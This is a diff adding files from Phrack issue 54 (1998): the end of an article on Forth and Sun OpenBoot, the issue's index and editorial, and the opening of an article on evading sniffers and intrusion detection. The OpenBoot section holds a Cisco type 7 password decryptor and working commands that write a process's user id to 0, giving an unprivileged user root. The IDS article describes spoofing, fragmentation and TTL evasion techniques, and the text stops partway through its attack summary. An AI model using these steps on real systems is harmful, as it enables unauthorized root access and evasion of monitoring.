+the Sparc architecture (such as NeXTSTEP and the *BSD's) but it's always fun
+to see how the system starts up as almost nobody seems to think about security
+at that point.  In this article we will start by writing a simple program to
+turn the LED light on the hardware on and off.  We will then write a cisco
+type 7 password decryptor for Pforth - which is a FORTH interpreter written
+for the 3Com PalmPilot PDA.  At that point I will show how to change the
+credential structure of a running process to 0 (root).
+
+FORTH is a very simple, yet powerful language.  It is tremendously small and
+compact which lends it extremely well to embedded systems.  This is one of the
+main reasons that the bootstrapping of hardware and software on Suns is done
+in FORTH.  If you have ever used a scientific, or often referred to as "Reverse
+Polish Notation", calculator then you understand the stack based premise
+behind FORTH.
+
+[elapsed time 1.5 weeks]
+
+EEEKS!  So I'm rummaging through some of my files and find that I've been
+neglect in my duties of finishing this article...  One moment, one more glass
+of port (it's always good to move on to port after a few beers...).  Ahh. Ok,
+on to some basic Forth examples to get everybody in the right mindset. Let's
+try the old standard of 2+3.
+
+In stack based notation this is expressed as 2 3 +.  Think of every element
+being pushed onto the stack and then operands dealing with the top layers in
+reverse order.  Thus, 2 pushes the number 2 on the stack, 3 pushes the number
+3 on the stack, and + says take the top two numbers off of the stack and
+push the result on to the stack in their place [diagram 1].
+
+[diagram 1]
+
+     2    3   +
+
+   ---   ---   ---
+  | 2 | | 3 | | 5 |
+   ---  |---|  ---
+        | 2 |
+         ---
+
+[note: to pop the top of the stack and display it on the screen type '.']
+
+
+Simple?  You bet.  Try it out on your favorite piece of Sun hardware.  L1-A
+(the L1 key might be labeled 'Stop') give the following a shot:
+
+<++> EX/4th/blink.4
+ok :light-on
+     1 aux@ or aux! ;
+ok :light-off
+     1 invert aux@ and aux! ;
+ok
+<-->
+
+Now when you type light-on, the led on the front of the Sparc turns on.
+Conversely, light-off turns the led off.  On installations with OpenBoot 3.x
+I believe this is a built in FORTH word as led-on and led-off.  Older versions
+of OpenBoot don't have this built in word - but now you can add it.
+
+Here's what all of the above actually means -
+   :light-on  - this marks the beginning of a new word definition which ends
+                when a semi-colon is seen.
+   1          - pushes 1 on the stack.
+   aux@       - takes the value stored in the aux register and pushes it
+                onto the stack.
+   or         - takes the top two values from the stack, OR's them and leaves
+                the result in their place.
+   aux!       - takes the value on the top of the stack and writes it to the
+                aux register.
+   ;          - ends the word definition.
+
+   :light-off - this marks the beginning of a new word definition which ends
+                when a semi-colon is seen.
+   1          - pushes 1 on the stack.
+   invert     - inverts the bits or the value on the top of the stack
+   aux@       - takes the value stored in the aux register and pushes it
+                onto the stack.
+   and        - takes the top two values from the stack, AND's them and leaves
+                the result in their place.
+   aux!       - takes the value on the top of the stack and writes it to the
+                aux register.
+   ;          - ends the word definition.
+
+ [note - you can see the disassembly of the led-on / led-off words, if they
+         are in your openboot with ' ok led-on (see)' ]
+
+----
+
+The PalmPilot is a rockin' little PDA based off of the Motorola 68328
+(DragonBall) processor.  At the L0pht we all went out and picked up PalmPilots
+as soon as we saw all of the wonderful unused features of the Motorola
+processor in it.  Ahhhh, taking us back to similar feelings of messing about in
+the 6502.
+
+PForth is a bit different from the OpenBoot forth implementation in some minor
+ways - most notably in the default input bases and how words such as 'abort'
+are handled.  I figured a little app for the Pilot in FORTH might help people
+see the usefulness of the language on other devices than the Sun firmware.
+The porting of this to work in an OpenBoot environment is left as an exercise
+to the reader.
+
+The cisco type 7 password decryptor is a bit more complex than the led-on /
+light-on example above [see the book references at the end of this article for
+a much more thorough explanation of the FORTH language].
+
+--begin cisco decryptor--
+<++> EX/4th/cisco_decryptor.4
+\ cisco-decrypt
+
+include string
+( argh! We cannot _create_ the )
+( constant array as P4th dies )
+( around the 12th byte - )
+( thus the ugliness of setting it )
+( up in :main   .mudge)
+
+variable ciscofoo 40 allot
+variable encpw 60 allot
+variable decpw 60 allot
+variable strlen
+variable seed
+variable holder
+
+:toupper ( char -- char )
+ dup dup 96 > rot 123 < and if
+ 32 -
+ then ;
+
+:ishexdigit ( char -- f )
+ dup dup 47 > rot 58 < and if
+  drop - 1
+ else
+  dup dup 64 > 71 < and if
+  drop - 1
+ else
+  drop 0 then then ;
+
+:chartonum ( char -- i )
+ toupper
+ dup ishexdigit 0= if
+  abort" contains invalid char "
+ then
+ dup
+ 58 < if
+  48 -
+ else
+  55 -
+ then ;
+
+:main
+100 ciscofoo 0 + C!
+115 ciscofoo 1 + C!
+102 ciscofoo 2 + C!
+100 ciscofoo 3 + C!
+59 ciscofoo 4 + C!
+107 ciscofoo 5 + C!
+115 ciscofoo 6 + C!
+111 ciscofoo 7 + C!
+65 ciscofoo 8 + C!
+44 ciscofoo 9 + C!
+46 ciscofoo 10 + C!
+105 ciscofoo 11 + C!
+121 ciscofoo 12 + C!
+101 ciscofoo 13 + C!
+119 ciscofoo 14 + C!
+114 ciscofoo 15 + C!
+107 ciscofoo 16 + C!
+108 ciscofoo 17 + C!
+100 ciscofoo 18 + C!
+74 ciscofoo 19 + C!
+75 ciscofoo 20 + C!
+68 ciscofoo 21 + C!
+
+32 word count (addr + 1, strlen )
+strlen!
+
+encpw strlen @ cmove> drop
+
+cr
+
+( make sure the string is > 3 chars )
+strlen @ 4 < if abort" short input"
+then
+
+strlen @ 2 mod ( valid encpw's )
+( must have even number of chars )
+0= 0= if abort" odd input" then
+
+encpw C@ 48 - 10 *
+encpw 1 + C@ 48 - + seed!
+
+seed @ 15 > if abort" incalid seed"
+then
+
+0 holder !
+
+strlen @ 1 + 2 do
+ i 2 = 0= i 2 mod 0= and if
+  holder @ ciscofoo seed @ + C@ xor
+  emit
+  seed @ 1 + seed !
+  0 holder !
+  i strlen @ = if
+   cr quit then
+  then
+
+  i 2 mod 0= if
+  encpw i + C@ chartonum 16 *
+  holder !
+ else
+  encpw i + C@ chartonum holder @ +
+  holder !
+ then
+
+loop ;
+<-->
+
+--end cisco decryptor--
+
+Ok - after that brief little excursion we return to the Sparc hardware.
+
+So, how can this information be used from a more traditional hacking
+standpoint?  Let's say you are sitting in front of a nice system running
+Solaris but for whatever reason you only have an unprivileged account.  Since
+there is not any setup in the hardware to delineate different users and their
+ability to access memory (well, not in the way you think about it inside of
+Unix processes) you really have free roam of the system.
+
+Each process is allocated a structure defining various aspects about itself.
+This is needed when processes are swapped out and in to memory.  As a regular
+user you really aren't allowed to muck about in this structure but a quick
+L1-A will get us around all of that. Peeking into /usr/include/sys/proc.h
+shows that what we are really after is the process credentials structure.
+This is located after a pointer to a vnode, a pointer to the process address
+space, and two mutex locks.  At that point there is a pointer to a cred struct
+which has the process credentials.  Inside the process credentials structure
+you find :
+
+     reference count     (long)
+     effective user id   (short)
+     effective group id  (short)
+     real user id        (short)
+     real group id       (short)
+     "saved" user id     (short)
+     "saved" group id    (short)
+     etc...
+
+Eyes lighting up yet?  All of these variables are accessible when you are at
+the command prompt.  The first thing that you need to figure out is the start
+of the proc structure for a given process ID (PID).  Let's assume I have a
+shell running (tcsh in this case).  In tcsh and csh the PID of the shell is
+stored in $$.
+
+    Alliant+ ps -eaff | grep $$
+    mudge   914   913  1 15:29:31 pts/5    0:01 tcsh
+
+Sure enough, that's my tcsh. Now simply use ps to find the beginning of
+the proc structure:
+
+    Alliant+ ps -lp $$
+    F S   UID   PID  PPID  C PRI NI     ADDR     SZ    WCHAN TTY      TIME CMD
+    8 S   777   914   913  0  51 20 f5e09000    436 f5e091d0 pts/5    0:01 tcsh
+
+You can find the layout of your proc structure in /usr/include/sys/proc.h.
+From this it is apparent that the pointer to the credential structure is
+located 24 bytes into the proc struct. In the above example that means the
+pointer is at 0xf5e09000 + 0x18 or 0xf5e09018.  The credential struct is
+listed in /usr/include/sys/cred.h.  From this we note that the effective user
+id is 4 bytes into the cred structure.
+
+Just so you can see that there's nothing hidden up my sleeves -
+
+    Alliant+ id
+    uid=777(mudge) gid=1(other)
+
+Fire up the trusty OpenBoot system via L1-A and get the pointer to the
+cred structure via :
+
+ok hex f5e09000 18 + l@ .
+f5a99858
+ok go
+
+Now, get the effective user id by
+ok hex f5a99858 4 + l@ .
+309   (309 hex == 777 decimal)
+ok go
+
+Of course you want to change this to 0 (euid root):
+ok hex 0 f5a99858 4 + l!
+ok go
+
+check your credentials!
+
+Alliant+ id
+uid=777(mudge) gid=1(other) euid=0(root)
+
+If you want to change the real user id it would be an offset of 12 (0xc):
+
+ok hex 0 f5a99858 c + l!
+ok go
+
+Alliant+ id
+uid=0(root) gid=1(other)
+
+Needless to say, there's a whole different world living inside that hardware
+in front of you that is begging to be played and fiddled with.  Keep in mind
+that you can do serious damage by mucking around in there though.
+
+enjoy,
+
+mudge@l0pht.com
+---
+http://www.l0pht.com
+---
+
+Some excellent FORTH books that you should get to learn more about this are:
+
+    Starting FORTH, Leo Brodie, Prentice-Hall, Inc. ISBN 0-13-842922-7
+    OpenBoot 3.x Command Reference Manual, SunSoft [get from a Sun Reseller]
+
+    Pilot FORTH was written by Neal Bridges (nbridges@interlog.com) -
+    http://www.interlog.com/~nbridges
+
+
+----[  EOF
+
diff --git a/phrack54/1.txt b/phrack54/1.txt
new file mode 100644
index 0000000..ec530ca
--- /dev/null
+++ b/phrack54/1.txt
@@ -0,0 +1,249 @@
+---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 01 of 12
+
+
+-------------------------[  P H R A C K     5 4     I N D E X
+
+
+--------[  Living in SYN
+
+Things that we want for Christmas:  Functional remote operating system
+detection.  Functional remote promiscuous mode detection.  Functional agent
+based intrusion detection.
+
+A note about this issue.  Loyal and perceptive readers will notice this issue
+is a bit smaller.  There are two reasons for this.  The first is swift
+delivery.  We are attempting to make Phrack issues a bit more svelte in
+order to pump them out on a more timely basis.  The other reason is quality.
+There is enough garbage out there.  We turn down at least half of all
+submissions to bring you the good stuff.  Enjoy.
+
+Rewind to August 1998.
+
+It's Sunday morning in Las Vegas, about 5:00am-ish.  Angstrom and I decide
+to leave the Hard Rock Hotel.  It's been a long night of drinking and
+gambling.  I am up maybe $200.  He's up about $30.  We're both inebriated
+beyond repair.  We return to Jackie Gaughan's Plaza Hotel and Casino, a
+wretched place where the old go to get older and everyone's got at least one
+foot in the grave.  Back to the Future II?  Biff's Pleasure Palace?  Welcome
+to the Plaza Hotel.
+
+Anyhow, we saunter on in, make our way over to the lounge and find Artimage, 
+Asriel, Glyph, and Alhambra.*   After some random dialogue (the specifics of
+which I have completely forgotten) Asriel tells me I should play some more 
+Blackjack.
+
+    "I only have hundreds." was my reply.  I didn't want to play anymore
+    anyhow.  This was the 6th day of my Vegas stint and I was burnt on
+    gambling.
+
+    "<shrug> Bet a hundred then." says As.
+
+    "<shrug>  Ok."  I caved.
+
+I plop down on a unoccupied blackjack table and plunk my hundred down.  The
+dealer was a gentle looking 200 year old man from Laos.
+
+    "MONEY PLAYZ!" I say.  I remember being very drunk.
+
+    "Money plays?" He questions?  The pit boss wakes up.
+
+    "Money plays." I confirm
+
+    "Money plays!" He announces to the pit boss.  The pit boss scribbles in his
+    book.
+
+Here's where the details get fuzzy.  I can't remember the hand I was dealt, nor
+any subsequent cards.  All I know is I played textbook blackjack.  That's all
+you need to know here.  I played according to the `book`.  I lost that hundred.
+At that point, my blackjack betting system kicked in.  I lay down 2 more
+bills.
+
+    "Money playz." I repeat.
+
+    "Money plays!" He announces to the pit boss.  The pit boss scribbles
+    something else in his little book.
+
+My system is simple and almost foolproof.  Bet small when you are just fucking
+around.  Bet big when you want to win big.  Lose a big hand?  Double your bet.
+Lose again?  Double it again.  Lose again?  Goto 1.  The odds in blackjack
+tend to hover around .05% house favor (this can vary widely depending on
+several factors including the type of blackjack, the number of decks, the
+skill of the player, whether or not the player counts cards, the card counting
+scheme used, etc**).  Eventually, odds are, you will win all your money back,
+AND THEN SOME!***  Of course, this relies on both your bankroll and the table
+maximum being unlimited.  Small details I usually overlook.
+
+So I lose the 2 hundred.
+
+THE SYSTEM IS STILL IN FULL EFFECT.  I plunk down another 4 small.
+
+    "Money plays?" The dealer musses?  I nod.
+
+    "Money plays." The pit boss scribbles.
+
+I lose another hand.  Bye-bye 4 hundred.
+
+Asriel is laughing at this point.
+
+    "Dude, I think you should quit now."  He offers.
+    "Nah.  I'm not done yet."
+
+Hrm.  Time to gather my thoughts.  No more namby-pamby.  Time to separate
+the armchair gamblers from the hard-core haggard idiot types who end up having
+to live in Vegas.  I peel off 10 hundreds.  1 large is placed in that little
+betting circle thingy.
+
+    "Money plays." The pit boss scribbles, Onlookers gawk, I pray.
+
+Now this hand I remember distinctly.  First card: an 8.  Hrm.  Second card: a
+6.  Ugh.  Dealer shows an 8.  FUCK.  Oh.  Good.  Well, that's $1700 well spent
+in about 2 minutes.  Well.  I had to hit.  I get a 6.  Wow.  WOW!  Dealer
+flips his hold card.  A 10.
+
+    "HAHAHAHHAHAHAHAHAHA" I proclaim.
+
+    "10 blacks out" The dealer shouts.  The pit boss stops writing.
+
+    "Want to be rated?"  He asks.
+
+    "Nope!  Bye!"  And off I went to cash out.
+
+
+* http://www.infonexus.com/~daemon9/PIX/Misc/defcon6/r00tdinner%2b/latenite3.jpg
+** Actually, playing basic strategy alone can sometimes give you a pretty
+close to even odds (or even better then even).  Usually, however, you will
+find that you will need to count cards in addition to basic strategy to have a
+real advantage.
+*** Assoc. Editor's note:  If you take this advice, chances are you'll be
+a very upset and angry gambler come next Defcon.  Whine to route when you
+can't afford a hotel room, not me.  Maybe he'll let you sleep on his floor.
+
+A special shout-out to Ron Rivest.  It has worked its way down the grapevine
+that he reads Phrack.  Add one more to the Super Elite People That REad Phrack
+(SEPTREP) list.  If you are or know one of these people, please send email to
+the editor to be added to the list (See linenoise for the list).
+
+A word of caution about P54-06 and P54-10:  If you attempt to apply the kernel
+patches for these articles in succession on the same system, the second one
+will fail at the syscalls.master file.  You will need to patch this by hand.
+It's not hard.  Go ahead and try it.  I trust you.
+
+Enjoy the magazine.  It is by and for the hacking community.  Period.
+
+
+-- Editor in Chief ----------------[  route
+-- Associate Editor ---------------[  alhambra
+-- Phrack World News --------------[  disorder
+-- Phrack Publicity ---------------[  dangergirl
+-- Phrack Webpage Guy -------------[  X
+-- Phrack Typographical fixer -----[  silitek
+-- Phrack Special Consultant ------[  redragon
+-- Mad Cow disease ----------------[  sir dystic and dildog
+-------- Elite -------------------->  daveg
+-- Official Phrack/r00t auto ------[  BMW M3
+-- Your trusted security advisors -[  p and sw_r
+-- Shout Outs and Thank Yous ------[  kamee, vision, artimage, chris, meenk,
+-----------------------------------|  the former SNI team, n8, phundie, par,
+-----------------------------------|  radium, k0re, horizon, dhg, mds, mudge,
+-----------------------------------|  bioh, pm (for the elite dox)
+
+
+Phrack Magazine V. 8, #54, Dec 25th, 1998.  ISSN 1068-1035
+Contents Copyright (c) 1998 Phrack Magazine. All Rights Reserved.  Nothing
+may be reproduced in whole or in part without written permission from the
+editor in chief.  Phrack Magazine is made available quarterly to the public,
+free of charge.  Go nuts people.
+
+Contact Phrack Magazine
+-----------------------
+Submissions:        phrackedit@phrack.com
+Commentary:         loopback@phrack.com
+Editor in Chief:    route@phrack.com
+Associate Editor:   alhambra@phrack.com
+Publicist:          dangergrl@phrack.com
+Phrack World News:  disorder@phrack.com
+
+Submissions to the above email address may be encrypted with the following key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.2
+
+mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW
+ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O
+vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j
+0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W
+DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG
+/v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0GjxwaHJhY2tlZGl0QGlu
+Zm9uZXh1cy5jb20+tA9QaHJhY2sgTWFnYXppbmU=
+=1iyt
+-----END PGP PUBLIC KEY BLOCK-----
+
+As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED.  Phrack goes out
+plaintext.  You certainly can subscribe in plaintext.
+
+phrack:~# head -20 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of the
+ *  editors and contributors, truthful and accurate.  When possible, all facts
+ *  are checked, all code is compiled.  However, we are not omniscient (hell,
+ *  we don't even get paid).  It is entirely possible something contained
+ *  within this publication is incorrect in some way.  If this is the case,
+ *  please drop us some email so that we can correct it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for the
+ *  entirely stupid (or illegal) things people may do with the information
+ *  contained herein.  Phrack is a compendium of knowledge, wisdom, wit, and
+ *  sass.  We neither advocate, condone nor participate in any sort of illicit
+ *  behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in the
+ *  articles of Phrack Magazine are intellectual property of their authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+-------------------------[  T A B L E   O F   C O N T E N T S
+
+ 1 Introduction                                            Phrack Staff   22K
+ 2 Phrack Loopback                                         Phrack Staff   58K
+ 3 Phrack Line Noise                                       various        90K
+ 4 Phrack Prophile on the parmaster                        Phrack Staff   26K
+ 5 Linux and Random Source Bleaching                       phunda mental 174K
+ 6 Hardening OpenBSD for Multiuser Environments            route          90K
+ 7 Scavenging Connections On Dynamic-IP Networks           Seth McGann    34K
+ 8 NT Web Technology Vulnerabilities                       rfp            40K
+ 9 Remote OS detection via TCP/IP Stack Fingerprinting     Fyodor         58K
+10 Defeating Sniffers and Intrusion Detection Systems      horizon       100K
+11 Phrack World News                                       Disorder      240K
+12 extract.c                                               Phrack Staff   32K
+
+                                                                         966K
+
+-----------------------------------------------------------------------------
+
+    "...a bellvue in the mental hospital world of media whore web pages..."
+        - xanax on #phrack, 10-13-1998, when asked to comment on Antionline.
+
+    "This is not a tool we should take seriously, or our customers should take
+    seriously..."
+        - Edmund Muth, Microsoft, as reported by the New York Times,
+          referring to Back Orifice.  (How many thousands of machines were
+          owned with BO?)
+
+    *deraadt* your style is so unlike anyone elses, that is makes no sense that
+    you have this "style"
+        - Theo Deraadt, OpenBSD project leader, refering to route's code in
+          this issue.
+
+    "So I thought of something useful I could do with the money. I bought
+     a Nintendo 64 for one of my sisters, who has a slight mental retardation. 
+     The reason for this was because the doctors have always told us that
+     things to stimulate her hand eye coordination would help her."
+        - Chameloen of the `masters of downloading` "hacking group",
+          commenting on why he didn't spend money on medical care for his
+          sister.
+
+-----------------------------------------------------------------------------
+
+----[  EOF
diff --git a/phrack54/10.txt b/phrack54/10.txt
new file mode 100644
index 0000000..a3d5bab
--- /dev/null
+++ b/phrack54/10.txt
@@ -0,0 +1,1540 @@
+---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 10 of 12
+
+
+-------------------------[  Defeating Sniffers and Intrusion Detection Systems
+
+
+--------[  horizon <jmcdonal@unf.edu>
+
+
+----[  Overview
+
+The purpose of this article is to demonstrate some techniques that can be used
+to defeat sniffers and intrusion detection systems.  This article focuses
+mainly on confusing your average "hacker" sniffer, with some rough coverage of
+Intrusion Detection Systems (IDS).  However, the methods and code present in
+this article should be a good starting point for getting your packets past ID
+systems.  For an intense examination of attack techniques against IDS, check
+out: http://www.nai.com/products/security/advisory/papers/ids-html/doc000.asp.
+
+There are a large number of effective techniques other than those that are
+implemented in this article.  I have chosen a few generic techniques that
+hopefully can be easily expanded into more targeted and complex attacks.  After
+implementing these attacks, I have gone through and attempted to correlate
+them to the attacks described in the NAI paper, where appropriate.
+
+The root cause of the flaws discussed in this article is that most sniffers
+and intrusion detection systems do not have as robust of a TCP/IP
+implementation as the machines that are actually communicating on the network.
+Many sniffers and IDS use a form of datalink level access, such as BPF, DLPI,
+or SOCK_PACKET.  The sniffer receives the entire datalink level frame, and
+gets no contextual clues from the kernel as to how that frame will be
+interpreted.  Thus, the sniffer has the job of interpreting the entire packet
+and guessing how the kernel of the receiving machine is going to process it.
+Luckily, 95% of the time, the packet is going to be sane, and the kernel
+TCP/IP stack is going to behave rather predictably.  It is the other 5% of the
+time that we will be focusing on.
+
+This article is divided into three sections: an overview of the techniques
+employed, a description of the implementation and usage, and the code.  Where
+possible, the code has been implemented in a somewhat portable format: a
+shared library that wraps around connect(), which you can use LD_PRELOAD to
+"install" into your normal client programs.  This shared library uses raw
+sockets to create TCP packets, which should work on most unixes. However, some
+of the attacks described are too complex to implement with raw sockets, so
+simple OpenBSD kernel patches are supplied.  I am working on complementary
+kernel patches for Linux, which will be placed on the rhino9 web site when
+they are complete.  The rhino9 web site is at: http://www.rhino9.ml.org/ 
+
+
+----[  Section 1. The Tricks
+
+The first set of tricks are solely designed to fool most sniffers, and will
+most likely have no effect on a decent ID system.  The second set of tricks
+should be advanced enough to start to have an impact on the effectiveness of
+an intrusion detection system.
+
+Sniffer Specific Attacks
+------------------------
+
+1. Sniffer Design - One Host Design
+
+The first technique is extremely simple, and takes advantage of the design of
+many sniffers.  Several hacker sniffers are designed to follow one connection,
+and ignore everything else until that connection is closed or reaches some
+internal time out.  Sniffers designed in this fashion have a very low profile,
+as far as memory usage and CPU time.  However, they obviously miss a great deal
+of the data that can be obtained.  This gives us an easy way of preventing our
+packets from being captured: before our connection, we send a spoofed SYN
+packet from a non-existent host to the same port that we are attempting to
+connect to.  Thus, the sniffer sees the SYN packet, and if it is listening, it
+will set up its internal state to monitor all packets related to that
+connection.  Then, when we make our connection, the sniffer ignores our SYN
+because it is watching the fake host.  When the host later times out, our
+connection will not be logged because our initial SYN packet has long been
+sent.
+
+
+2. Sniffer Design - IP options
+
+The next technique depends on uninformed coding practices within sniffers.
+If you look at the code for some of the hacker sniffers, namely ones based-off
+of the original linsniffer, you will see that they have a structure that looks
+like this:
+
+struct etherpacket
+{
+    etherheader eh;
+    ipheader ip;
+    tcpheader tcp;
+    char data[8192];
+};
+
+The sniffer will read a packet off of the datalink interface, and then slam it
+into that structure so it can analyze it easily.  This should work fine most
+of the time.  However, this approach makes a lot of assumptions: it assumes
+that the size of the IP header is 20 bytes, and it also assumes that the size
+of the TCP header is 20 bytes. If you send an IP packet with 40 bytes of
+options, then the sniffer is going to look inside your IP options for the TCP
+header, and completely misinterpret your packet.  If the sniffer handles your
+IP header correctly, but incorrectly handles the TCP header, that doesn't buy
+you quite as much.  In that situation, you get an extra 40 bytes of data that
+the sniffer will log. I have implemented mandatory IP options in the OpenBSD
+kernel such that it is manageable by a sysctl.
+
+
+3. Insertion - FIN and RST Spoofing - Invalid Sequence Numbers
+
+This technique takes advantage of the fact that your typical sniffer is not
+going to keep track of the specific details of the ongoing connection.  In a
+TCP connection, sequence numbers are used as a control mechanism for
+determining how much data has been sent, and the correct order for the data
+that has been sent.  Most sniffers do not keep track of the sequence numbers
+in an ongoing TCP connection.  This allows us to insert packets into the data
+stream that the kernel will disregard, but the sniffer will interpret as valid.
+The first technique we will use based on this is spoofing FIN and RST packets.
+FIN and RST are control flags inside the TCP packets, a FIN indicating the
+initiation of a shutdown sequence for one side of a connection, and an RST
+indicating that a connection should be immediately torn down. If we send a
+packet with a FIN or RST, with a sequence number that is far off of the current
+sequence number expected by the kernel, then the kernel will disregard it.
+However, the sniffer will likely regard this as a legitimate connection close
+request or connection reset, and cease logging.
+
+It is interesting to note that certain implementations of TCP stacks do not
+check the sequence numbers properly upon receipt of an RST.  This obviously
+provides a large potential for a denial of service attack.  Specifically, I
+have noticed that Digital Unix 4.0d will tear down connections without
+checking the sequence numbers on RST packets.
+
+
+4. Insertion - Data Spoofing - Invalid Sequence Numbers
+
+This technique is a variation of the previous technique, which takes advantage
+of the fact that a typical sniffer will not follow the sequence numbers of a
+TCP connection.  A lot of sniffers have a certain data capture length, such
+that they will stop logging a connection after that amount of data has been
+captured.  If we send a large amount of data after the connection initiation,
+with completely wrong sequence numbers, our packets will be dropped by the
+kernel.  However, the sniffer will potentially log all of that data as valid
+information.  This is roughly an implementation of the "tcp-7" attack mentioned
+in the NAI paper.
+
+
+IDS / Sniffer Attacks:
+---------------------
+
+The above techniques work suprisingly well for most sniffers, but they are not
+going to have much of an impact on most IDS.  The next six techniques are a
+bit more complicated, but represent good starting points for getting past the
+more complex network monitors. 
+
+
+5. Evasion - IP Fragmentation
+
+IP fragmentation allows packets to be split over multiple datagrams in order
+to fit packets within the maximum transmission unit of the physical network
+interface.  Typically, TCP is aware of the mtu, and doesn't send packets that
+need to be fragmented at an IP level.  We can use this to our advantage to try
+to confuse sniffers and IDS.  There are several potential attacks involving
+fragmentation, but we will only cover a simple one.  We can send a TCP packet
+split over several IP datagrams such that the first 8 bytes of the TCP header
+are in a single packet, and the rest of the data is sent in 32 byte packets.
+This actually buys us a lot in our ability to fool a network analysis tool.
+First of all, the sniffer/IDS will have to be capable of doing fragment
+reassembly.  Second of all, it will have to be capable of dealing with
+fragmented TCP headers.  It turns out that this simple technique is more than
+sufficient to get your packets past most datalink level network monitors.
+This an another attack that I chose to implement as a sysctl in the OpenBSD
+kernel.
+
+This technique is very powerful in it's ability to get past most sniffers
+completely.  However, it requires some experimentation because you have to
+make sure that your packets will get past all of the filters between you and
+the target.  Certain packet filters wisely drop fragmented packets that look
+like they are going to rewrite the UDP/TCP header, or that look like they are
+unduly small.  The implementation in this article provides a decent deal of
+control over the size of the fragments that your machine will output.  This
+will allow you to implement the "frag-1" and "frag-2" attacks described in the
+NAI paper.
+
+
+6. Desynchronization - Post Connection SYN
+
+If we are attempting to fool an intelligent sniffer, or an ID system, then we
+can be pretty certain that it will keep track of the TCP sequence numbers.  For
+this technique, we will attempt to desynchronize the sniffer/IDS from the
+actual sequence numbers that the kernel is honoring.  We will implement this
+attack by sending a post connection SYN packet in our data stream, which will
+have divergent sequence numbers, but otherwise meet all of the necessary
+criteria to be accepted by our target host.  However, the target host will
+ignore this SYN packet, because it references an already established
+connection.  The intent of this attack is to get the sniffer/IDS to
+resynchronize its notion of the sequence numbers to the new SYN packet.  It
+will then ignore any data that is a legitimate part of the original stream,
+because it will be awaiting a different sequence number.  If we succeed in
+resynchronizing the IDS with a SYN packet, we can then send an RST packet with
+the new sequence number and close down its notion of the connection.  This
+roughly corresponds with the "tcbc-2" attack mentioned in the NAI paper.
+
+
+7. Desynchronization - Pre Connection SYN
+
+Another attack we perform which is along this theme is to send an initial SYN
+before the real connection, with an invalid TCP checksum.  If the sniffer is
+smart enough to ignore subsequent SYNs in a connection, but not smart enough
+to check the TCP checksum, then this attack will synchronize the sniffer/IDS
+to a bogus sequence number before the real connection occurs.  This attack
+calls bind to get the kernel to assign a local port to the socket before
+calling connect.
+
+
+8. Insertion - FIN and RST Spoofing - TCP checksum validation
+
+This technique is a variation of the FIN/RST spoofing technique mentioned
+above.  However, this time we will attempt to send FIN and RST packets that
+should legitimately close the connection, with one notable exception: the TCP
+checksum will be invalid.  These packets will be immediately dropped by the
+kernel, but potentially honored by the IDS/sniffer.  This attack requires
+kernel support in order to determine the correct sequence numbers to use on
+the packet.  This is similar to the "insert-2" attack in the NAI paper.
+
+
+9. Insertion - Invalid Data - TCP checksum validation 
+
+This technique is a variation of the previous data insertion attack, with the
+exception that we will be inserting data with the correct sequence numbers,
+but incorrect TCP checksums.  This will serve to confuse and desynchronize
+sniffers and ID by feeding it a lot of data that will not be honored by the
+participating kernels.  This attack requires kernel support to get the correct
+sequence numbers for the outgoing packets.  This attack is also similar to the
+"insert-2" attack described in the NAI paper.
+
+
+10. Insertion - FIN and RST Spoofing - Short TTL
+
+If the IDS or sniffer is sitting on the network such that it is one or more
+hops away from the host it is monitoring, then we can do a simple attack,
+utilizing the TTL field of the IP packet.  For this attack, we determine the
+lowest TTL that can be used to reach the target host, and then subtract one.
+This allows us to send packets that will not reach the target host, but that
+have the potential of reaching the IDS or sniffer. In this attack, we send a
+couple of FIN packets, and a couple of RST packets.
+
+
+11. Insertion - Data Spoofing - Short TTL
+
+For our final attack, we will send 8k of data with the correct sequence
+numbers and TCP checksums. However, the TTL will be one hop too short to reach
+our target host. 
+
+Summary
+-------
+
+All of these attacks work in concert to confuse sniffers and IDS.  Here is a
+breakdown of the order in which we perform them:
+
+Attack 1 - One Host Sniffer Design.
+  FAKEHOST -> TARGET SYN 
+Attack 7 - Pre-connect Desynchronization Attempt.
+  REALHOST -> TARGET SYN (Bad TCP Checksum, Arbitrary Seq Number)
+Kernel Activity
+  REALHOST -> TARGET SYN (This is the real SYN, sent by our kernel)
+Attack 6 - Post-connect Desynchronization Attempt.
+  REALHOST -> TARGET SYN (Arbitrary Seq Number X)
+  REALHOST -> TARGET SYN (Seq Number X+1)
+Attack 4 - Data Spoofing - Invalid Sequence Numbers
+  REALHOST -> TARGET DATA x 8 (1024 bytes, Seq Number X+2)
+Attack 5 - FIN/RST Spoofing - Invalid Sequence Numbers
+  REALHOST -> TARGET FIN (Seq Number X+2+8192)
+  REALHOST -> TARGET FIN (Seq Number X+3+8192)
+  REALHOST -> TARGET RST (Seq Number X+4+8192)
+  REALHOST -> TARGET RST (Seq Number X+5+8192)
+Attack 11 - Data Spoofing - TTL 
+* REALHOST -> TARGET DATA x 8 (1024 bytes, Short TTL, Real Seq Number Y)
+Attack 10 - FIN/RST Spoofing - TTL
+* REALHOST -> TARGET FIN (Short TTL, Seq Number Y+8192)
+* REALHOST -> TARGET FIN (Short TTL, Seq Number Y+1+8192)
+* REALHOST -> TARGET RST (Short TTL, Seq Number Y+2+8192)
+* REALHOST -> TARGET RST (Short TTL, Seq Number Y+3+8192)
+Attack 9 - Data Spoofing - Checksum
